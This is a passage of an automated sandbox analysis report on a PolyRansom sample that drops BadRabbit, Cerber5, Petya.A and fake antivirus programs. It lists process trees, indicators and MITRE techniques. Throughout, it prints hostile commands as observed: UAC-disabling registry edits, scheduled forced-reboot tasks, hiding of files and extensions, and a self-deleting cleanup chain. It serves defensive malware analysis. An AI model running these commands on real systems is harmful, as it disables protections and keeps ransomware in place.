692	Endermanch@Antivirus.exe
692	Endermanch@Antivirus.exe
692	Endermanch@Antivirus.exe
692	Endermanch@Antivirus.exe
692	Endermanch@Antivirus.exe
1980	Endermanch@SmartDefragmenter.exe
2780	winsp2up.exe

Suspicious use of UnmapMainImage 2 IoCs

Processes:

Endermanch@Cerber5.exeEndermanch@NoMoreRansom.exe

pid process

1492 Endermanch@Cerber5.exe
1344 Endermanch@NoMoreRansom.exe

pid	process
1492	Endermanch@Cerber5.exe
1344	Endermanch@NoMoreRansom.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exeEndermanch@BadRabbit.exe

description	pid	process	target process
PID 1768 wrote to memory of 692	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Antivirus.exe
PID 1768 wrote to memory of 692	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Antivirus.exe
PID 1768 wrote to memory of 692	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Antivirus.exe
PID 1768 wrote to memory of 692	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Antivirus.exe
PID 1768 wrote to memory of 1000	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPlatinum.exe
PID 1768 wrote to memory of 1000	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPlatinum.exe
PID 1768 wrote to memory of 1000	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPlatinum.exe
PID 1768 wrote to memory of 1000	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPlatinum.exe
PID 1768 wrote to memory of 1000	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPlatinum.exe
PID 1768 wrote to memory of 1000	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPlatinum.exe
PID 1768 wrote to memory of 1000	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPlatinum.exe
PID 1768 wrote to memory of 1884	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPro2017.exe
PID 1768 wrote to memory of 1884	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPro2017.exe
PID 1768 wrote to memory of 1884	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPro2017.exe
PID 1768 wrote to memory of 1884	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AntivirusPro2017.exe
PID 1768 wrote to memory of 892	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AnViPC2009.exe
PID 1768 wrote to memory of 892	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AnViPC2009.exe
PID 1768 wrote to memory of 892	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AnViPC2009.exe
PID 1768 wrote to memory of 892	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AnViPC2009.exe
PID 1768 wrote to memory of 892	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AnViPC2009.exe
PID 1768 wrote to memory of 892	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AnViPC2009.exe
PID 1768 wrote to memory of 892	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@AnViPC2009.exe
PID 1768 wrote to memory of 1200	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@BadRabbit.exe
PID 1768 wrote to memory of 1200	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@BadRabbit.exe
PID 1768 wrote to memory of 1200	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@BadRabbit.exe
PID 1768 wrote to memory of 1200	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@BadRabbit.exe
PID 1768 wrote to memory of 1200	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@BadRabbit.exe
PID 1768 wrote to memory of 1200	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@BadRabbit.exe
PID 1768 wrote to memory of 1200	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@BadRabbit.exe
PID 1768 wrote to memory of 1800	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Birele.exe
PID 1768 wrote to memory of 1800	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Birele.exe
PID 1768 wrote to memory of 1800	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Birele.exe
PID 1768 wrote to memory of 1800	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Birele.exe
PID 1768 wrote to memory of 1492	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Cerber5.exe
PID 1768 wrote to memory of 1492	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Cerber5.exe
PID 1768 wrote to memory of 1492	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Cerber5.exe
PID 1768 wrote to memory of 1492	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@Cerber5.exe
PID 1768 wrote to memory of 964	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@DeriaLock.exe
PID 1768 wrote to memory of 964	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@DeriaLock.exe
PID 1768 wrote to memory of 964	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@DeriaLock.exe
PID 1768 wrote to memory of 964	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@DeriaLock.exe
PID 1768 wrote to memory of 1700	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@FakeAdwCleaner.exe
PID 1768 wrote to memory of 1700	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@FakeAdwCleaner.exe
PID 1768 wrote to memory of 1700	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@FakeAdwCleaner.exe
PID 1768 wrote to memory of 1700	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@FakeAdwCleaner.exe
PID 1768 wrote to memory of 1748	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@HappyAntivirus.exe
PID 1768 wrote to memory of 1748	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@HappyAntivirus.exe
PID 1768 wrote to memory of 1748	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@HappyAntivirus.exe
PID 1768 wrote to memory of 1748	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@HappyAntivirus.exe
PID 1200 wrote to memory of 624	1200	Endermanch@BadRabbit.exe	rundll32.exe
PID 1200 wrote to memory of 624	1200	Endermanch@BadRabbit.exe	rundll32.exe
PID 1200 wrote to memory of 624	1200	Endermanch@BadRabbit.exe	rundll32.exe
PID 1200 wrote to memory of 624	1200	Endermanch@BadRabbit.exe	rundll32.exe
PID 1200 wrote to memory of 624	1200	Endermanch@BadRabbit.exe	rundll32.exe
PID 1200 wrote to memory of 624	1200	Endermanch@BadRabbit.exe	rundll32.exe
PID 1200 wrote to memory of 624	1200	Endermanch@BadRabbit.exe	rundll32.exe
PID 1768 wrote to memory of 2020	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@InfinityCrypt.exe
PID 1768 wrote to memory of 2020	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@InfinityCrypt.exe
PID 1768 wrote to memory of 2020	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@InfinityCrypt.exe
PID 1768 wrote to memory of 2020	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@InfinityCrypt.exe
PID 1768 wrote to memory of 1608	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@InternetSecurityGuard.exe
PID 1768 wrote to memory of 1608	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@InternetSecurityGuard.exe
PID 1768 wrote to memory of 1608	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@InternetSecurityGuard.exe
PID 1768 wrote to memory of 1608	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	Endermanch@InternetSecurityGuard.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

Endermanch@SmartDefragmenter.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Endermanch@SmartDefragmenter.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	Endermanch@SmartDefragmenter.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

2788 attrib.exe
2608 attrib.exe

pid	process
2788	attrib.exe
2608	attrib.exe

C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
"C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe"
1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768

C:\Users\Admin\AppData\Local\Temp\Endermanch@Antivirus.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Antivirus.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:692

C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPlatinum.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPlatinum.exe"
2⤵
- Executes dropped EXE
PID:1000

C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPro2017.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPro2017.exe"
2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:1884

C:\Users\Admin\AppData\Local\Temp\Endermanch@AnViPC2009.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@AnViPC2009.exe"
2⤵
- Executes dropped EXE
PID:892

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
3⤵
PID:4276

C:\Users\Admin\AppData\Local\Temp\Endermanch@BadRabbit.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@BadRabbit.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\SysWOW64\cmd.exe
/c schtasks /Delete /F /TN rhaegal
4⤵
PID:2872

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /F /TN rhaegal
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2635896854 && exit"
4⤵
PID:2372

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2635896854 && exit"
5⤵
- Creates scheduled task(s)
PID:3308

C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 12:59:00
4⤵
PID:988

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 12:59:00
5⤵
- Creates scheduled task(s)
PID:2148

C:\Windows\B56B.tmp
"C:\Windows\B56B.tmp" \\.\pipe\{75ACB937-FCAC-477C-9E38-6B7F3924A8CC}
4⤵
- Executes dropped EXE
PID:2852

C:\Users\Admin\AppData\Local\Temp\Endermanch@Birele.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Birele.exe"
2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
PID:1800

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM explorer.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Users\Admin\AppData\Local\Temp\Endermanch@DeriaLock.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@DeriaLock.exe"
2⤵
- Executes dropped EXE
PID:964

C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1700

C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Users\Admin\AppData\Local\Temp\Endermanch@HappyAntivirus.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@HappyAntivirus.exe"
2⤵
- Executes dropped EXE
PID:1748

C:\Users\Admin\AppData\Local\Temp\Endermanch@InfinityCrypt.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@InfinityCrypt.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2020

C:\Users\Admin\AppData\Local\Temp\Endermanch@Cerber5.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Cerber5.exe"
2⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
PID:1492

C:\Users\Admin\AppData\Local\Temp\Endermanch@InternetSecurityGuard.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@InternetSecurityGuard.exe"
2⤵
- Enumerates VirtualBox registry keys
- Executes dropped EXE
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
PID:1608

C:\Users\Admin\AppData\Local\Temp\Endermanch@Krotten.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Krotten.exe"
2⤵
- Executes dropped EXE
PID:860

C:\Users\Admin\AppData\Local\Temp\Endermanch@LPS2019.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@LPS2019.exe"
2⤵
- Executes dropped EXE
PID:1308

C:\Users\Admin\AppData\Local\Temp\Endermanch@Movie.mpeg.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Movie.mpeg.exe"
2⤵
- Executes dropped EXE
PID:1404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /pid 1404 & ping -n 3 127.1 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Endermanch@Movie.mpeg.exe" & start C:\Users\Admin\AppData\Local\ogkfdop.exe -f
3⤵
PID:2536

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /pid 1404
4⤵
- Kills process with taskkill
PID:2224

C:\Windows\SysWOW64\PING.EXE
ping -n 3 127.1
4⤵
- Runs ping.exe
PID:3032

C:\Users\Admin\AppData\Local\ogkfdop.exe
C:\Users\Admin\AppData\Local\ogkfdop.exe -f
4⤵
PID:3332

C:\Users\Admin\AppData\Local\Temp\Endermanch@NavaShield.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@NavaShield.exe"
2⤵
- Executes dropped EXE
PID:1192

C:\Users\Admin\AppData\Local\Temp\Endermanch@NoMoreRansom.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@NoMoreRansom.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of UnmapMainImage
PID:1344

C:\Users\Admin\AppData\Local\Temp\Endermanch@PCDefender.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@PCDefender.exe"
2⤵
- Executes dropped EXE
PID:1464

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"
3⤵
PID:2800

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:1536

C:\Users\Admin\WoIIwYkc\DikkIMsc.exe
"C:\Users\Admin\WoIIwYkc\DikkIMsc.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1576

C:\ProgramData\WuUIQoAs\lwIEIUAw.exe
"C:\ProgramData\WuUIQoAs\lwIEIUAw.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:672

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
3⤵
- Loads dropped DLL
PID:744

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
4⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
5⤵
PID:2568

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
6⤵
PID:3076

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
7⤵
PID:3376

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
8⤵
PID:3844

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
9⤵
PID:4020

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
10⤵
PID:3308

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
11⤵
PID:2132

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
12⤵
PID:4576

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
13⤵
PID:4640

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
13⤵
- Modifies registry key
PID:4680

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SEcAkIEE.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe""
13⤵
PID:4708

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
14⤵
PID:1716

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
13⤵
- Modifies registry key
PID:4700

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
13⤵
- Modifies registry key
PID:4688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
11⤵
- Modifies registry key
PID:2548

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\dIUUosEM.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe""
11⤵
PID:3052

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
12⤵
PID:4584

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
11⤵
- Modifies registry key
PID:3056

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
11⤵
- Modifies registry key
PID:3028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
9⤵
- Modifies registry key
PID:2628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
9⤵
- Modifies registry key
PID:1816

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:1864

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Kgoswggo.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe""
9⤵
PID:3208

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
10⤵
PID:1048

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
7⤵
- Modifies registry key
PID:3508

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
7⤵
- Modifies registry key
PID:3540

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\BoAgMwEg.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe""
7⤵
PID:3560

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
8⤵
PID:3836

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:3548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
5⤵
- Modifies registry key
PID:2220

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
5⤵
- Modifies registry key
PID:2636

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2624

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qasQEUwI.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe""
5⤵
PID:2004

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
6⤵
PID:3440

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
3⤵
- Modifies registry key
PID:2080

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
3⤵
- Modifies registry key
PID:2144

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2212

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xkAwoEIQ.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe""
3⤵
PID:2332

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
4⤵
PID:2656

C:\Users\Admin\AppData\Local\Temp\Endermanch@Petya.A.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Petya.A.exe"
2⤵
- Executes dropped EXE
PID:1048

C:\Users\Admin\AppData\Local\Temp\Endermanch@RegistrySmart.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@RegistrySmart.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:952
